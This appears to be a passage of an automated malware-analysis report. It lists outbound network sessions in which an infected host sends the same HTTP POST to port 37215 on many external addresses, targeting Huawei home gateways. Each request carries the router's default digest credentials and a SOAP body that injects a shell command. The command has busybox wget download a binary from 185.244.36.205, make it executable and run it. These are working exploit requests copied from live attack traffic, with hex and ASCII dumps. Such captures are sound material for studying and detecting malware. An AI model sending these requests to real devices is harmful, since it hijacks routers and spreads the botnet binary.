                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              828192.168.2.1538126122.203.27.5837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.537801981 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              829192.168.2.1555364186.232.65.24737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.537827015 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              830192.168.2.154407237.238.211.3837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.537827969 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              831192.168.2.153591845.73.82.4137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.537862062 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              832192.168.2.1533346102.67.83.6937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.537867069 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              833192.168.2.154550645.127.190.19937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.537873030 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              834192.168.2.1549518190.218.198.8237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.537908077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              835192.168.2.1534550222.63.194.22537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.537939072 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              836192.168.2.1551588186.78.234.14237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.537940025 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              837192.168.2.1556764122.0.240.6537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.537961960 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
